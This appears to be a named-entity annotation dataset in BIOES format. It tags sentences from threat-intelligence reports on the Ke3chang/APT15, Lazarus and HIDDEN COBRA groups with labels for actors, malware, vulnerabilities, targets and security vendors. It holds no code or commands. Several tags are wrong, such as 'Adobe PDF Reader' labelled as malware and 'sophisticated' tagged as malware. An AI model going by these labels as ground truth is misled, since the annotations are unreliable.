+the O +Ke3chang B-ACT +campaign E-ACT +, O +as O +well O +as O +an O +in-depth O +assessment O +of O +the O +ongoing O +Syrian-themed B-ACT +attacks E-ACT +against O +these O +MFAs O +. O + +Ke3chang S-APT +attackers S-APT +have O +used O +spear-phishing S-ACT +emails S-TOOL +. O + +Ke3chang S-APT +has O +also O +leveraged O +a O +Java S-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2012-4681 S-VULID +) O +, O +as O +well O +as O +older O +, O +reliable O +exploits O +for O +Microsoft B-FILE +Word E-FILE +( O +CVE-2010-3333 S-VULID +) O +and O +Adobe B-MAL +PDF I-MAL +Reader E-MAL +( O +CVE-2010-2883 S-VULID +) O +. O + +Traditionally O +, O +the O +Ke3chang S-APT +attackers S-APT +have O +used O +spear-phishing S-ACT +emails S-TOOL +with O +either O +a O +malware O +attachment O +or O +a O +link O +to O +a O +malicious O +download O +. 
O + +Over O +the O +years O +, O +the O +Ke3chang S-APT +attackers S-APT +have O +used O +three O +types O +of O +malware O +that O +we O +call O +: O +" O +BS2005 S-MAL +" O +, O +" O +BMW S-MAL +" O +, O +and O +" O +MyWeb S-MAL +" O +. O + +it O +is O +a O +typical O +first O +stage O +backdoor O +commonly O +found O +in O +APT B-ACT +attacks E-ACT +. O + +The O +attackers S-APT +have O +used O +three O +types O +of O +malware O +over O +the O +years O +and O +have O +traditionally O +targeted O +the O +aerospace S-IDTY +, O +energy S-IDTY +, O +government S-IDTY +, O +high-tech S-IDTY +, O +consulting B-IDTY +services E-IDTY +, O +and O +chemicals S-IDTY +/ O +manufacturing S-IDTY +/ O +mining B-IDTY +sectors E-IDTY +. O + +All O +of O +the O +CnC O +communications O +are O +performed O +over O +the O +HTTP B-MAL +protocol E-MAL +. O + +The O +current O +Ke3chang B-ACT +campaign E-ACT +leverages O +the O +BS2005 S-MAL +malware S-MAL +, O +while O +older O +activity O +from O +2010 S-TIME +- O +2011 S-TIME +leveraged O +BMW S-MAL +, O +followed O +by O +the O +MyWeb S-MAL +malware S-MAL +sporadically O +used O +in O +between O +. O + +A O +trait O +common O +to O +all O +three O +malware O +families O +we O +analyzed O +is O +that O +they O +use O +the O +IWebBrowser2 B-MAL +COM E-MAL +interface O +to O +perform O +their O +CnC O +communication O +. O + +Three O +months O +after O +the O +Olympics-themed B-ACT +attacks E-ACT +, O +FireEye S-SECTEAM +observed O +a O +new O +BS2005 B-ACT +campaign E-ACT +labeled O +" O +newtiger S-ACT +" O +, O +which O +is O +possibly O +a O +reference O +to O +an O +older O +2010 B-ACT +campaign E-ACT +labeled O +" O +tiger O +" O +. O + +Using O +information O +from O +the O +FireEye B-SECTEAM +DTI E-SECTEAM +cloud O +, O +FireEye S-SECTEAM +observed O +that O +Ke3chang S-APT +targeted O +a O +single O +firm O +. 
O + +The O +Ke3chang S-APT +attackers S-APT +used O +the O +older O +" O +MyWeb S-MAL +" O +malware O +family O +from O +2010 S-TIME +to O +2011 S-TIME +. O + +The O +Ke3chang S-APT +attackers S-APT +used O +the O +older O +MyWeb S-MAL +malware S-MAL +family O +from O +2010 S-TIME +to O +2011 S-TIME +. O + +During O +our O +period O +of O +visibility O +into O +the O +BS2005 S-ACT +" O +moviestar S-ACT +" O +campaign O +against O +various O +ministries B-IDTY +of I-IDTY +foreign I-IDTY +affairs E-IDTY +in O +Europe S-LOC +, O +FireEye S-SECTEAM +discovered O +that O +the O +Ke3chang S-APT +had O +initially O +tested O +the O +malware O +in O +virtual O +machines O +, O +prior O +to O +compromising O +actual O +targets O +. O + +The O +MyWeb B-MAL +sample E-MAL +that O +FireEye S-SECTEAM +analyzed O +has O +a O +compile O +date O +of O +1/20/2011 S-TIME +. O + +At O +least O +one O +of O +the O +attacks O +in O +this O +campaign O +leveraged O +a O +European S-LOC +security O +and O +defense-themed O +lure O +, O +which O +aligns O +with O +the O +targeting O +preferences O +for O +this O +group O +. O + +MyWeb S-MAL +is O +the O +second-generation O +malware O +used O +by O +Ke3chang S-APT +. O + +ministries B-IDTY +of I-IDTY +foreign I-IDTY +affairs E-IDTY +in O +Europe S-LOC +have O +been O +targeted O +and O +compromised O +by O +a O +threat O +actor O +we O +call O +Ke3chang S-APT +. O + +This O +attack O +used O +the O +crisis O +in O +Syria S-LOC +as O +a O +lure O +to O +deliver O +malware O +to O +its O +targets O +. O + +Tracking O +the O +malicious B-ACT +activities E-ACT +of O +the O +elusive O +Ke3chang S-APT +APT O +group O +, O +ESET S-SECTEAM +researchers O +have O +discovered O +new O +versions O +of O +malware O +families O +linked O +to O +the O +group O +, O +and O +a O +previously O +unreported O +backdoor O +. 
O + +Furthermore O +, O +FireEye S-SECTEAM +has O +presented O +evidence O +indicating O +that O +the O +Ke3chang S-APT +attackers S-APT +have O +been O +active O +since O +at O +least O +2010 S-TIME +and O +have O +attacked O +targets O +related O +to O +G20 B-IDTY +meetings E-IDTY +in O +the O +past O +. O + +During O +our O +brief O +window O +of O +visibility O +into O +one O +of O +the O +known O +22 O +CnC O +nodes O +, O +FireEye S-SECTEAM +observed O +the O +Ke3chang S-APT +conducting O +reconnaissance O +and O +moving O +laterally O +throughout O +the O +compromised O +networks O +. O + +Ke3chang S-APT +attackers S-APT +are O +operating O +within O +China S-LOC +. O + +In O +May B-TIME +2017 E-TIME +, O +NCC B-SECTEAM +Group I-SECTEAM +'s I-SECTEAM +Incident I-SECTEAM +Response E-SECTEAM +team O +reacted O +to O +an O +ongoing O +incident O +. O + +which O +provides O +a O +range O +of O +services O +to O +UK B-IDTY +Government E-IDTY +. O + +APT15 S-APT +was O +targeting O +information O +related O +to O +UK S-LOC +government S-IDTY +departments O +and O +military B-IDTY +technology E-IDTY +. O + +backdoors O +that O +now O +appear O +to O +be O +part O +of O +APT15 S-APT +'s O +toolset O +. O + +This O +report O +demonstrates O +that O +Ke3chang S-APT +is O +able O +to O +successfully O +penetrate O +government S-IDTY +targets O +using O +exploits O +for O +vulnerabilities O +that O +have O +already O +been O +patched O +and O +despite O +the O +fact O +that O +these O +ministries O +have O +defenses O +in O +place O +. O + +RoyalDNS S-MAL +- O +required O +APT15 S-APT +. O + +The O +Ke3chang B-APT +group E-APT +also O +used O +keyloggers S-MAL +and O +their O +own O +.NET B-MAL +tool E-MAL +to O +enumerate O +folders O +and O +dump O +data O +from O +Microsoft S-IDTY +Exchange O +mailboxes O +. O + +APT15 S-APT +was O +also O +observed O +using O +Mimikatz S-MAL +to O +dump O +credentials O +and O +generate O +Kerberos O +golden O +tickets O +. 
O + +This O +time O +, O +APT15 S-APT +opted O +for O +a O +DNS B-MAL +based I-MAL +backdoor E-MAL +: O +RoyalDNS S-MAL +. O + +APT15 S-APT +then O +used O +a O +tool O +known O +as O +RemoteExec S-MAL +. O + +APT15 S-APT +then O +used O +a O +tool O +known O +as O +RemoteExec S-MAL +( O +similar O +to O +Microsoft S-IDTY +. O + +Coincidentally O +, O +following O +the O +recent O +hack O +of O +a O +US S-LOC +Navy S-IDTY +contractor O +and O +theft O +of O +highly O +sensitive O +data O +on O +submarine O +warfare O +, O +we O +have O +found O +evidence O +of O +very O +recent O +activity O +by O +a O +group O +referred O +to O +as O +APT15 S-APT +, O +known O +for O +committing O +cyber B-APT +espionage E-APT +which O +is O +believed O +to O +be O +affiliated O +with O +the O +Chinese S-LOC +government O +. O + +APT15 S-APT +is O +known O +for O +committing O +cyberespionage S-APT +against O +companies O +and O +organizations O +located O +in O +many O +different O +countries O +, O +targeting O +different O +sectors O +such O +as O +the O +oil B-IDTY +industry E-IDTY +, O +government B-IDTY +contractors E-IDTY +, O +military S-IDTY +, O +and O +more O +. O + +Other O +names O +for O +the O +group O +are O +Vixen B-APT +Panda E-APT +, O +Ke3chang S-APT +, O +Royal B-APT +APT E-APT +, O +and O +Playful B-APT +Dragon E-APT +. O + +ther O +names O +for O +the O +group O +are O +Vixen B-APT +Panda E-APT +, O +Ke3chang S-APT +, O +Royal B-APT +APT E-APT +, O +and O +Playful B-APT +Dragon E-APT +. O + +There O +are O +many O +articles O +and O +researches O +online O +about O +APT15 S-APT +and O +their O +activities S-ACT +, O +the O +most O +recent O +one O +by O +NCC B-SECTEAM +Group E-SECTEAM +. 
O + +There O +are O +many O +articles O +and O +researches O +online O +about O +APT15 S-APT +and O +their O +activities S-ACT +, O +the O +most O +recent O +one O +by O +NCC B-SECTEAM +Group E-SECTEAM +; O +although O +posted O +in O +March B-TIME +2018 E-TIME +, O +it O +refers O +to O +a O +campaign O +in O +2017 S-TIME +. O + +both O +attributed O +to O +Chinese S-LOC +government O +affiliated O +groups O +. O + +DLL B-ACT +hijacking I-ACT +techniques E-ACT +have O +been O +seen O +in O +the O +past O +with O +the O +APT15 B-APT +group E-APT +. O + +cyber B-APT +actors E-APT +of O +the O +North B-LOC +Korean E-LOC +to O +target O +the O +media S-IDTY +, O +aerospace S-IDTY +, O +financial S-IDTY +, O +and O +critical B-IDTY +infrastructure I-IDTY +sectors E-IDTY +in O +the O +United B-LOC +States E-LOC +and O +globally O +. O + +The O +U.S. B-IDTY +Government E-IDTY +refers O +to O +the O +malicious B-ACT +cyber I-ACT +activity E-ACT +by O +the O +North B-LOC +Korean E-LOC +government O +as O +HIDDEN B-APT +COBRA E-APT +. O + +Tools O +and O +capabilities O +used O +by O +HIDDEN B-APT +COBRA I-APT +actors E-APT +include O +DDoS B-MAL +botnets E-MAL +, O +keyloggers S-MAL +, O +remote B-MAL +access I-MAL +tools E-MAL +( O +RATs S-MAL +) O +, O +and O +wiper S-MAL +malware S-MAL +. O + +Variants O +of O +malware O +and O +tools O +used O +by O +HIDDEN B-APT +COBRA I-APT +actors E-APT +include O +Destover S-MAL +and O +Hangman S-MAL +. O + +DHS S-SECTEAM +has O +previously O +released O +Alert O +TA14-353A O +. O + +The O +DeltaCharlie O +DDoS O +bot O +was O +originally O +reported O +by O +Novetta S-SECTEAM +in O +their O +2016 S-TIME +Operation B-ACT +Blockbuster I-ACT +Malware E-ACT +Report O +. 
O + +Our O +analysis O +shows O +that O +the O +cybercriminals S-APT +behind O +the O +attack O +against O +an O +online O +casino O +in O +Central B-LOC +America E-LOC +, O +and O +several O +other O +targets O +in O +late-2017 S-TIME +, O +were O +most O +likely O +the O +infamous O +Lazarus B-APT +hacking I-APT +group E-APT +. O + +The O +Lazarus B-APT +Group E-APT +was O +first O +identified O +in O +Novetta S-SECTEAM +'s O +report O +Operation B-ACT +Blockbuster E-ACT +in O +February B-TIME +2016 E-TIME +. O + +cyberattacks O +against O +high-value O +targets O +in O +Ukraine S-LOC +in O +December B-TIME +2015 E-TIME +and O +December B-TIME +2016 E-TIME +. O + +In O +all O +of O +these O +incidents O +, O +the O +Lazarus S-APT +utilized O +similar O +toolsets O +, O +including O +KillDisk S-MAL +that O +was O +executed O +on O +compromised O +machines O +. O + +We O +are O +confident O +this O +KillDisk S-MAL +malware S-MAL +was O +deployed O +by O +Lazarus S-APT +, O +rather O +than O +by O +another O +, O +unrelated O +attacker S-APT +. O + +This O +recent O +attack O +against O +an O +online O +casino O +in O +Central B-LOC +America E-LOC +suggests O +that O +hacking O +tools O +from O +the O +Lazarus S-APT +toolset O +are O +recompiled O +with O +every O +attack O +( O +we O +didn't O +see O +these O +exact O +samples O +anywhere O +else O +) O +. O + +Utilizing O +KillDisk S-MAL +in O +the O +attack O +scenario O +most O +likely O +served O +one O +of O +two O +purposes O +: O +the O +attackers S-APT +covering O +their O +tracks O +after O +an O +espionage O +operation O +, O +or O +it O +was O +used O +directly O +for O +extortion O +or O +cyber-sabotage S-APT +. 
O + +Today O +we'd O +like O +to O +share O +some O +of O +our O +findings O +, O +and O +add O +something O +new O +to O +what O +'s O +currently O +common O +knowledge O +about O +Lazarus B-ACT +Group I-ACT +activities E-ACT +, O +and O +their O +connection O +to O +the O +much O +talked O +about O +February B-TIME +2016 E-TIME +incident O +, O +when O +an O +unknown O +attacker S-APT +attempted O +to O +steal O +up O +to O +$851M O +USD O +from O +Bangladesh B-IDTY +Central I-IDTY +Bank E-IDTY +. O + +Since O +the O +Bangladesh S-LOC +incident O +there O +have O +been O +just O +a O +few O +articles O +explaining O +the O +connection O +between O +Lazarus B-APT +Group E-APT +and O +the O +Bangladesh S-LOC +bank S-IDTY +heist O +. O + +However O +, O +from O +this O +it O +'s O +only O +clear O +that O +Lazarus S-APT +might O +have O +attacked O +Polish O +banks S-IDTY +. O + +Symantec S-SECTEAM +also O +confirmed O +seeing O +the O +Lazarus S-APT +wiper O +tool O +in O +Poland S-LOC +at O +one O +of O +their O +customers S-IDTY +. O + +Considering O +that O +the O +afterhack O +publications O +by O +the O +media S-IDTY +mentioned O +that O +the O +investigation O +stumbled O +upon O +three O +different O +attackers S-APT +, O +it O +was O +not O +obvious O +whether O +Lazarus S-APT +was O +the O +one O +responsible O +for O +the O +fraudulent O +SWIFT O +transactions O +, O +or O +if O +Lazarus S-APT +had O +in O +fact O +developed O +its O +own O +malware O +to O +attack O +banks S-IDTY +' O +systems O +. O + +We O +would O +like O +to O +add O +some O +strong O +facts O +that O +link O +some O +attacks O +on O +banks S-IDTY +to O +Lazarus S-APT +, O +and O +share O +some O +of O +our O +own O +findings O +as O +well O +as O +shed O +some O +light O +on O +the O +recent O +TTPs O +used O +by O +the O +attacker S-APT +, O +including O +some O +yet O +unpublished O +details O +from O +the O +attack O +in O +Europe S-LOC +in O +2017 S-TIME +. 
O + +Lazarus B-ACT +attacks E-ACT +are O +not O +a O +local O +problem O +and O +clearly O +the O +group O +'s O +operations O +span O +across O +the O +whole O +world O +. O + +Lazarus S-APT +was O +previously O +known O +to O +conduct O +cyberespionage B-ACT +and I-ACT +cybersabotage I-ACT +activities E-ACT +, O +such O +as O +attacks O +on O +Sony B-IDTY +Pictures I-IDTY +Entertainment E-IDTY +with O +volumes O +of O +internal O +data O +leaked O +, O +and O +many O +system O +harddrives O +in O +the O +company O +wiped O +. O + +We O +believe O +that O +Lazarus B-APT +Group E-APT +is O +very O +large O +and O +works O +mainly O +on O +infiltration O +and O +espionage B-ACT +operations E-ACT +, O +while O +a O +substantially O +smaller O +units O +within O +the O +group O +, O +which O +we O +have O +dubbed O +Bluenoroff S-APT +, O +is O +responsible O +for O +financial O +profit O +. O + +Lazarus S-APT +regrouped O +and O +rushed O +into O +new O +countries O +, O +selecting O +mostly O +poorer O +and O +less O +developed O +locations O +, O +hitting O +smaller O +banks S-IDTY +because O +they O +are O +, O +apparently O +, O +easy O +prey O +. O + +To O +date O +, O +the O +Lazarus B-APT +group E-APT +has O +been O +one O +of O +the O +most O +successful O +in O +launching O +large O +scale O +operations O +against O +the O +financial B-IDTY +industry E-IDTY +. O + +We O +believe O +that O +Lazarus S-APT +will O +remain O +one O +of O +the O +biggest O +threats O +to O +the O +banking B-IDTY +sector E-IDTY +, O +finance S-IDTY +, O +and O +trading B-IDTY +companies E-IDTY +, O +as O +well O +as O +casinos S-IDTY +for O +the O +next O +few O +years O +. O + +We O +believe O +Lazarus S-APT +started O +this O +watering B-ACT +hole I-ACT +attack E-ACT +at O +the O +end B-TIME +of I-TIME +2016 E-TIME +after O +their O +other O +operation O +was O +interrupted O +in O +South B-LOC +East I-LOC +Asia E-LOC +. 
O + +We O +believe O +they O +started O +this O +watering B-ACT +hole I-ACT +campaign E-ACT +at O +the O +end B-TIME +of I-TIME +2016 E-TIME +after O +their O +other O +operation O +was O +interrupted O +in O +South B-LOC +East I-LOC +Asia E-LOC +. O + +A O +rudimentary O +but O +somewhat O +clever O +design O +, O +KiloAlfa S-MAL +provides O +keylogging O +capability O +for O +the O +Lazarus B-APT +Group E-APT +'s O +collection O +of O +malicious O +tools O +. O + +The O +design O +of O +KiloAlfa S-MAL +is O +broken O +down O +into O +two O +basic O +components O +: O +the O +persistence O +functionality O +and O +the O +keylogging B-MAL +functionality E-MAL +. O + +The O +persistence O +functionality O +of O +KiloAlfa S-MAL +allows O +the O +malware O +to O +self-install O +on O +a O +victim O +'s O +machine O +when O +activated O +( O +described O +below O +) O +. O + +Evidence O +suggest O +that O +the O +Lazarus B-APT +Group E-APT +uses O +compromised B-MAL +infrastructure E-MAL +as O +the O +public-facing O +touchpoint O +for O +the O +majority O +of O +their O +malware O +samples O +. O + +PapaAlfa S-MAL +is O +believed O +to O +be O +one O +of O +the O +proxy O +malware O +components O +that O +the O +Lazarus B-APT +Group E-APT +uses O +to O +hide O +the O +true O +command O +and O +control O +server O +for O +operations O +. O + +Rather O +, O +PapaAlfa S-MAL +could O +be O +considered O +a O +smart O +proxy O +due O +in O +part O +to O +the O +fact O +that O +the O +Lazarus S-APT +can O +easily O +switch O +the O +backend O +destination O +address O +and O +PROT O +without O +having O +to O +reestablish O +control O +over O +the O +infected O +machine O +hosting O +the O +PapaAlfa S-MAL +malware S-MAL +. O + +In O +terms O +of O +form O +factor O +, O +PapaAlfa S-MAL +comes O +in O +two O +flavors O +: O +service B-MAL +DLL E-MAL +and O +standalone B-MAL +executable E-MAL +. 
O + +The O +IndiaBravo-PapaAlfa B-MAL +installer E-MAL +is O +responsible O +for O +installing O +the O +service O +DLL S-TOOL +variant O +. O + +While O +the O +tools O +profiled O +in O +this O +report O +are O +not O +inherently O +malicious O +, O +their O +capabilities O +are O +nonetheless O +integral O +to O +the O +Lazarus B-APT +Group E-APT +'s O +cyber O +operations O +, O +both O +espionage S-ACT +and O +destructive O +in O +nature O +, O +making O +them O +inherently O +dangerous O +to O +potential O +victims O +. O + +These O +tools O +often O +lay O +the O +groundwork O +for O +further O +malicious B-ACT +activity E-ACT +, O +such O +as O +the O +targeting O +of O +antivirus O +capabilities O +and O +the O +disabling O +of O +firewalls O +, O +both O +of O +which O +are O +very O +fundamental O +defensive O +measures O +. O + +Furthermore O +, O +like O +many O +other O +identified O +Lazarus B-APT +Group E-APT +families O +, O +these O +tools O +showcase O +the O +group O +'s O +creative O +solutions O +, O +such O +as O +the O +PapaAlfa S-MAL +, O +which O +makes O +it O +difficult O +to O +immediately O +identify O +potentially O +malicious B-ACT +activity E-ACT +on O +a O +compromised O +network O +. O + +The O +first O +class O +, O +colloquially O +known O +as O +" O +wipers S-MAL +" O +, O +are O +a O +class O +of O +malware O +has O +the O +primary O +intent O +of O +destroying O +data O +on O +a O +victim O +'s O +machine O +. O + +DDoS S-MAL +malware S-MAL +floods O +a O +target O +'s O +network-connected O +service O +with O +an O +excessive O +number O +of O +request O +at O +once O +in O +order O +to O +overload O +the O +capacity O +of O +the O +server O +. O + +For O +example O +, O +DeltaAlfa S-FILE +specifies O +a O +DDoS B-MAL +bot E-MAL +family O +identified O +as O +Alfa O +. 
O + +The O +naming O +scheme O +used O +by O +Novetta S-SECTEAM +for O +the O +malware O +identified O +during O +Operation B-ACT +Blockbuster E-ACT +consists O +of O +at O +least O +two O +identifiers O +which O +each O +identifier O +coming O +from O +the O +International B-IDTY +Civil I-IDTY +Aviation I-IDTY +Organization E-IDTY +( O +ICAO S-IDTY +) O +'s O +phonetic O +alphabet O +,2 O +commonly O +referred O +to O +as O +the O +NATO O +phonetic O +alphabet O +. O + +Loaders O +are O +typically O +responsible O +for O +loading O +a O +DLL S-TOOL +component O +into O +memory O +given O +that O +a O +DLL S-TOOL +cannot O +operate O +in O +a O +standalone O +mode O +such O +as O +an O +executable O +. O + +This O +report O +will O +explore O +the O +various O +installers S-MAL +, O +uninstallers S-MAL +and O +loaders O +Novetta S-SECTEAM +has O +observed O +the O +Lazarus B-APT +Group E-APT +using O +. O + +This O +reverse O +engineering O +report O +looks O +at O +the O +RATs S-MAL +and O +staging S-MAL +malware S-MAL +found O +within O +the O +Lazarus B-APT +Group E-APT +'s O +collection O +. O + +Regardless O +of O +their O +sophistication O +or O +refinement O +, O +the O +malware O +families O +within O +the O +Lazarus B-APT +Group E-APT +'s O +India S-LOC +and O +Lima S-LOC +classes O +perform O +at O +a O +reasonable O +level O +for O +their O +designed O +purpose O +: O +the O +introduction O +and O +persistence O +of O +malware O +from O +the O +Lazarus B-APT +Group E-APT +on O +a O +victim O +'s O +infrastructure O +. O + +While O +the O +capabilities O +for O +the O +installers S-MAL +, O +loaders S-MAL +, O +and O +uninstallers S-MAL +in O +this O +report O +are O +relatively O +straight O +forward O +and O +single-focused O +, O +analysis O +of O +these O +malware O +families O +provide O +further O +insight O +into O +the O +capabilities O +of O +the O +Lazarus B-APT +Group E-APT +. 
O + +The O +Lazarus B-APT +Group E-APT +employs O +a O +variety O +of O +RATs S-MAL +that O +operate O +in O +both O +client O +mode O +and O +server O +mode O +. O + +The O +most O +common O +communication O +mode O +for O +a O +RAT S-MAL +is O +to O +act O +as O +a O +client S-ACT +to O +a O +remote O +server O +. O + +The O +Lazarus B-APT +Group E-APT +employs O +a O +variety O +of O +RATs S-MAL +and O +staging S-MAL +malware S-MAL +to O +conduct O +cyber O +operations O +, O +many O +of O +which O +contain O +significant O +code O +overlap O +that O +points O +to O +at O +least O +a O +shared O +development O +environment O +. O + +While O +some O +members O +within O +the O +Romeo S-APT +and O +Sierra B-APT +groups E-APT +may O +not O +implement O +sound O +authentication O +strategies O +, O +shift O +their O +design O +focus O +in O +abrupt O +and O +unusual O +manners O +, O +and O +fail O +to O +understand O +the O +pitfalls O +of O +distributed O +command O +networks O +, O +on O +the O +whole O +the O +families O +within O +the O +Lazarus B-APT +Group E-APT +'s O +collection O +of O +RATs S-MAL +and O +staging S-MAL +malware S-MAL +perform O +their O +tasks O +with O +surprising O +effectiveness O +. O + +This O +new O +campaign O +, O +dubbed O +HaoBao S-ACT +, O +resumes O +Lazarus S-APT +' O +previous O +phishing B-ACT +emails S-TOOL +, O +posed O +as O +employee O +recruitment O +, O +but O +now O +targets O +Bitcoin B-IDTY +users E-IDTY +and O +global O +financial B-IDTY +organizations E-IDTY +. O + +This O +new O +campaign O +, O +dubbed O +HaoBao S-ACT +, O +resumes O +Lazarus S-APT +' O +previous O +phishing B-ACT +emails S-TOOL +, O +posed O +as O +employee O +recruitment O +, O +but O +now O +targets O +financial B-IDTY +organizations E-IDTY +. 
O + +McAfee B-SECTEAM +Advanced I-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +analysts O +have O +discovered O +an O +aggressive O +Bitcoin-stealing B-ACT +phishing I-ACT +campaign E-ACT +by O +the O +international O +cybercrime O +group O +Lazarus S-APT +that O +uses O +sophisticated S-MAL +malware S-MAL +with O +long-term O +impact O +. O + +McAfee B-SECTEAM +Advanced I-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +( O +ATR S-SECTEAM +) O +analysts O +have O +discovered O +an O +aggressive O +Bitcoin-stealing B-ACT +phishing I-ACT +campaign E-ACT +by O +the O +international O +cybercrime O +group O +Lazarus S-APT +that O +uses O +sophisticated S-MAL +malware S-MAL +with O +long-term O +impact O +. O + +Beginning O +in O +2017 S-TIME +, O +the O +Lazarus B-APT +group E-APT +heavily O +targeted O +individuals O +with O +spear B-ACT +phishing E-ACT +emails S-TOOL +impersonating O +job B-IDTY +recruiters E-IDTY +which O +contained O +malicious O +documents O +. O + +The O +use O +of O +decoy B-MAL +documents E-MAL +also O +reveals O +some O +of O +the O +potential O +targets O +of O +the O +Lazarus B-APT +group E-APT +'s O +malicious B-ACT +activity E-ACT +, O +specifically O +the O +use O +spear B-ACT +phishing I-ACT +attacks E-ACT +observed O +targeting O +South B-LOC +Korean E-LOC +government S-IDTY +and O +aerospace B-IDTY +organizations E-IDTY +. O + +The O +campaign O +lasted O +from O +April S-TIME +to O +October S-TIME +and O +used O +job O +descriptions O +relevant O +to O +target O +organizations O +, O +in O +both O +English O +and O +Korean O +language O +. O + +The O +Lazarus B-APT +Group E-APT +'s O +objective O +was O +to O +gain O +access O +to O +the O +target O +'s O +environment O +and O +obtain O +key O +military O +program O +insight O +or O +steal O +money O +. 
O + +In O +this O +latest O +discovery O +by O +McAfee S-SECTEAM +, O +despite O +a O +short O +pause O +in O +similar O +operations O +, O +the O +Lazarus B-APT +group E-APT +targets O +financial B-IDTY +organizations E-IDTY +. O + +This O +campaign O +is O +tailored O +to O +identifying O +those O +who O +are O +running O +Bitcoin S-TOOL +related O +software O +through O +specific O +system O +scans O +. O + +This O +Malware O +Analysis O +Report O +( O +MAR O +) O +is O +the O +result O +of O +analytic O +efforts O +between O +the O +Department B-SECTEAM +of I-SECTEAM +Homeland I-SECTEAM +Security E-SECTEAM +( O +DHS S-SECTEAM +) O +and O +the O +Federal B-IDTY +Bureau I-IDTY +of I-IDTY +Investigation E-IDTY +( O +FBI S-IDTY +) O +. O + +When O +victims O +open O +malicious O +documents O +attached O +to O +the O +emails S-TOOL +, O +the O +malware O +scans O +for O +Bitcoin B-ACT +activity E-ACT +and O +then O +establishes O +an O +implant O +for O +long-term O +data-gathering O +. O + +According O +to O +trusted O +third-party O +reporting O +, O +HIDDEN B-APT +COBRA I-APT +actors E-APT +have O +likely O +been O +using O +FALLCHILL S-MAL +malware S-MAL +since O +2016 S-TIME +to O +target O +the O +aerospace S-IDTY +, O +telecommunications S-IDTY +, O +and O +finance B-IDTY +industries E-IDTY +. O + +The O +malware O +is O +a O +fully O +functional O +RAT S-MAL +with O +multiple O +commands O +that O +the O +actors S-APT +can O +issue O +from O +a O +command O +and O +control O +( O +C2 S-TOOL +) O +server O +to O +a O +victim O +'s O +system O +via O +dual O +proxies O +. O + +FALLCHILL S-MAL +typically O +infects O +a O +system O +as O +a O +file O +dropped O +by O +other O +HIDDEN B-MAL +COBRA I-MAL +malware E-MAL +or O +as O +a O +file O +downloaded O +unknowingly O +by O +users O +when O +visiting O +sites O +compromised O +by O +HIDDEN B-APT +COBRA I-APT +actors E-APT +. 
O + +HIDDEN B-APT +COBRA I-APT +actors E-APT +use O +an O +external B-MAL +tool E-MAL +or O +dropper S-MAL +to O +install O +the O +FALLCHILL S-MAL +malware S-MAL +to O +establish O +persistence O +. O + +HIDDEN B-APT +COBRA I-APT +actors E-APT +install O +the O +FALLCHILL S-MAL +malware S-MAL +to O +establish O +persistence O +. O + +Working O +with O +U.S. S-LOC +government S-IDTY +partners O +, O +DHS S-SECTEAM +and O +FBI S-SECTEAM +identified O +Internet B-PROT +Protocol E-PROT +( O +IP S-PROT +) O +addresses O +and O +other O +indicators O +of O +compromise O +( O +IOCs O +) O +associated O +with O +a O +remote B-MAL +administration I-MAL +tool E-MAL +( O +RAT S-MAL +) O +used O +by O +the O +North B-LOC +Korean E-LOC +government—commonly O +known O +as O +FALLCHILL S-MAL +. O + +This O +alert O +'s O +IOC B-FILE +files E-FILE +provide O +HIDDEN B-APT +COBRA E-APT +indicators O +related O +to O +FALLCHILL S-MAL +. O + +McAfee B-SECTEAM +Advanced I-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +analysts O +have O +uncovered O +a O +global O +data O +reconnaissance O +campaign O +assaulting O +a O +wide O +number O +of O +industries O +including O +critical B-IDTY +infrastructure E-IDTY +, O +entertainment S-IDTY +, O +finance S-IDTY +, O +health B-IDTY +care E-IDTY +, O +and O +telecommunications S-IDTY +. O + +Because O +of O +this O +, O +additional O +HIDDEN B-MAL +COBRA I-MAL +malware E-MAL +may O +be O +present O +on O +systems O +compromised O +with O +FALLCHILL S-MAL +. O + +This O +campaign O +, O +dubbed O +Operation B-ACT +GhostSecret E-ACT +, O +leverages O +multiple O +implants O +, O +tools O +, O +and O +malware O +variants O +associated O +with O +the O +state-sponsored O +cyber O +group O +HIDDEN B-APT +COBRA E-APT +. O + +From O +March B-TIME +18 E-TIME +to O +26 S-TIME +we O +observed O +the O +malware O +operating O +in O +multiple O +LOCs O +of O +the O +world O +. 
O + +Furthermore O +, O +the O +Advanced B-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +team O +has O +discovered O +Proxysvc S-MAL +, O +which O +appears O +to O +be O +an O +undocumented O +implant O +. O + +Our O +investigation O +into O +this O +campaign O +reveals O +that O +the O +actor S-APT +used O +multiple O +malware O +implants O +, O +including O +an O +unknown O +implant O +with O +capabilities O +similar O +to O +Bankshot S-MAL +. O + +The O +attackers S-APT +behind O +Operation B-ACT +GhostSecret E-ACT +used O +a O +similar O +infrastructure O +to O +earlier O +threats O +, O +including O +SSL B-MAL +certificates E-MAL +used O +by O +FakeTLS S-MAL +in O +implants O +found O +in O +the O +Destover B-MAL +backdoor E-MAL +variant O +known O +as O +Escad S-MAL +, O +which O +was O +used O +in O +the O +Sony B-ACT +Pictures E-ACT +attack O +. O + +Based O +on O +our O +analysis O +of O +public O +and O +private O +information O +from O +submissions O +, O +along O +with O +product O +telemetry O +, O +it O +appears O +Proxysvc S-MAL +was O +used O +alongside O +the O +2017 S-TIME +Destover S-MAL +variant O +and O +has O +operated O +undetected O +since O +mid-2017 S-TIME +. O + +This O +new O +variant O +resembles O +parts O +of O +the O +Destover S-MAL +malware S-MAL +, O +which O +was O +used O +in O +the O +2014 S-TIME +Sony B-ACT +Pictures E-ACT +attack O +. O + +The O +Lazarus S-APT +used O +a O +similar O +infrastructure O +to O +earlier O +threats O +, O +including O +the O +Destover B-MAL +backdoor E-MAL +variant O +known O +as O +Escad S-MAL +. O + +The O +McAfee B-SECTEAM +Advanced I-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +team O +discovered O +a O +previously O +unknown O +data-gathering B-FILE +implant E-FILE +that O +surfaced O +in O +mid-February B-TIME +2018 E-TIME +. 
